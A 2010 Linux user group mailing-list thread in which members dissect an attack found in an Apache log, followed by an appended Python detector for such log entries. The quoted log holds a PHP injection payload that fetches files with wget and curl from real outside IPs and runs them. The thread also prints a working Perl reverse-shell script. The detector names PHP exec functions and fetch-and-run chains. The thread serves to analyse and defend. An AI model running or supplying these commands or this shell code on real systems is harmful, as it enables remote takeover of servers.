
Re: [LUG] PHP, Perl, server securing, etc.


On Tue, 22 Jun 2010 20:37:15 +0100 (BST)
Gordon Henderson wrote:

> 
> And who says Linux isn't targeted by scammers, etc...
> 
> 
> I noticed this in a log-file earlier - I see this sort of thing
> regularly, but thought I'd post one here for you:
> 
> 94.199.181.165 - - [22/Jun/2010:19:13:20 +0100] "GET 
> /index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../proc/self/environ%00
>  
> HTTP/1.1" 404 270 "-" "<?system('cd /var/tmp;wget 
> http://195.239.120.69/cb.txt;perl cb.txt 192.24.5.30 80;wget 
> http://195.239.120.69/cback;chmod +x cback;./cback 192.24.5.30 80;cd 
> /dev/shm;curl -O http://195.239.120.69/cb.txt;perl cb.txt 192.24.5.30 
> 80;curl -O http://195.239.120.69/cback;chmod +x cback;./cback
> 192.24.5.30 80');?> ;<?exec_shell('cd /var/tmp;wget
> http://195.239.120.69/cb.txt;perl cb.txt 192.24.5.30 80;wget
> http://195.239.120.69/cback;chmod +x cback;./cback 192.24.5.30
> 80;cd /dev/shm;curl -O http://195.239.120.69/cb.txt;perl cb.txt
> 192.24.5.30 80;curl -O http://195.239.120.69/cback;chmod +x
> cback;./cback 192.24.5.30 80');?> ;<?passthru('cd /var/tmp;wget
> http://195.239.120.69/cb.txt;perl cb.txt 192.24.5.30 80;wget
> http://195.239.120.69/cback;chmod +x cback;./cback 192.24.5.30
> 80;cd /dev/shm;curl -O http://195.239.120.69/cb.txt;perl cb.txt
> 192.24.5.30 80;curl -O http://195.239.120.69/cback;chmod +x
> cback;./cback 192.24.5.30 80');?>;Ustupid MF is Back; Mozilla/4.0
> (compatible; MSIE 6.0; Windows 98)"
> 
> That's an entry from an apache server log-file. Good, eh?  I'm not
> sure what sort of index.php might respond to that request, however
> it's trying to run a program to wget a file, then perl the file.
> 
> The perl file it gets, basically runs this:
> 
> #!/usr/bin/perl
> use Socket;
> $cmd= "lynx";
> $system= 'echo "`uname -a`";echo "`id`";HISTFILE=/dev/null /bin/sh
> -i'; $0=$cmd;
> $target=$ARGV[0];
> $port=$ARGV[1];
> $iaddr=inet_aton($target) || die("Error: $!\n");
> $paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
> $proto=getprotobyname('tcp');
> socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
> connect(SOCKET, $paddr) || die("Error: $!\n");
> open(STDIN, ">&SOCKET");
> open(STDOUT, ">&SOCKET");
> open(STDERR, ">&SOCKET");
> system($system);
> close(STDIN);
> close(STDOUT);
> close(STDERR);
> 
> which appears to send some basic information to a remote site.
> 
> then it fetches 'cback'. This is a binary file - and guess what it's 
> compiled for:
> 
> file cback
>    cback: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV),
> for GNU/Linux 2.0.0, dynamically linked (uses shared libs), stripped
> 
> Not going to execute it, but dumping strings from it reveals this:
> 
> %s <host> <port>
> socket ok
> /bin/sh
> error: %s
> retring in 5 seconds
> fork error, retyr in 5 seconds
> cannot create socket, retring in 5 seconds
> GCC: (GNU) 3.3.3
> 
> 
> 
> My guess is that it's sitting there, waiting for commands from a
> remote site - to do what? Who knows.
> 
> So there you go - Linux *is* being targeted and obviously the target
> above is for some specific site running some specific version of some
> software, but who knows!

I just downloaded the Reverse Engineering Compiler (REC) and decompiled
the cback file to some C code.  I have no idea what it says as I really
haven't a clue when it comes to C/C++.

I won't post the contents as this is a public and archived list.
Anyone wants the RECed C code to have a look through, let me know and I
can email you off-list.

Grant.

-- 
The Mailing List for the Devon & Cornwall LUG
http://mailman.dclug.org.uk/listinfo/list
FAQ: http://www.dcglug.org.uk/linux_adm/list-faq.html
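Detection logic for the kind of log entry quoted in Gordon's message, as an added example that is not part of the original thread: it parses Apache combined-format access-log lines and flags the traversal to /proc/self/environ, the %00 terminator, and the PHP open tag, command-execution calls and fetch-and-run chains in the User-Agent. The sample log lines are constructed (RFC 5737 addresses); the second is shaped like the quoted entry.

```python
import re

# Apache "combined" log format: host ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Request-path indicators: deep traversal, the environ pseudo-file, %00 path truncation.
PATH_INDICATORS = {
    "traversal": re.compile(r"(?:\.\./){3,}"),
    "proc_environ": re.compile(r"/proc/self/environ", re.I),
    "null_byte": re.compile(r"%00"),
}
# User-Agent indicators: PHP open tag, PHP command-execution functions, download-then-run chains.
UA_INDICATORS = {
    "php_tag": re.compile(r"<\?"),
    "php_exec_func": re.compile(r"\b(?:system|passthru|exec|shell_exec|exec_shell)\s*\(", re.I),
    "fetch_and_run": re.compile(r"\b(?:wget|curl)\s+.*https?://", re.I),
}

def parse_line(line):
    """Fields of one combined-format line as a dict, or None if the line does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None

def indicators(entry):
    """Names of the indicators that fire on a parsed entry (empty list means nothing matched)."""
    parts = entry["req"].split(" ")
    path = parts[1] if len(parts) >= 2 else entry["req"]
    hits = [f"path:{n}" for n, rx in PATH_INDICATORS.items() if rx.search(path)]
    hits += [f"ua:{n}" for n, rx in UA_INDICATORS.items() if rx.search(entry["ua"])]
    return hits

def scan(lines):
    """(ip, hits) for every line with at least one indicator; unparseable lines are skipped."""
    out = []
    for e in filter(None, map(parse_line, lines)):
        hits = indicators(e)
        if hits:
            out.append((e["ip"], hits))
    return out

# Constructed sample lines; the status code is irrelevant to the match (the quoted entry was a 404).
SAMPLE_LOG = [
    '192.0.2.10 - - [22/Jun/2010:19:10:00 +0100] "GET /index.php?page=news HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    "198.51.100.7 - - [22/Jun/2010:19:13:20 +0100] \"GET /index.php?_SERVER[ConfigFile]=../../../../../../proc/self/environ%00 HTTP/1.1\" 404 270 \"-\" \"<?system('wget http://203.0.113.5/cb.txt');?> Mozilla/4.0\"",
]
```

A hit on either half alone is worth reviewing: the path indicators show the include attempt even when mod_security or a different index.php returns a 404, and the User-Agent indicators catch the same payload aimed at other scripts.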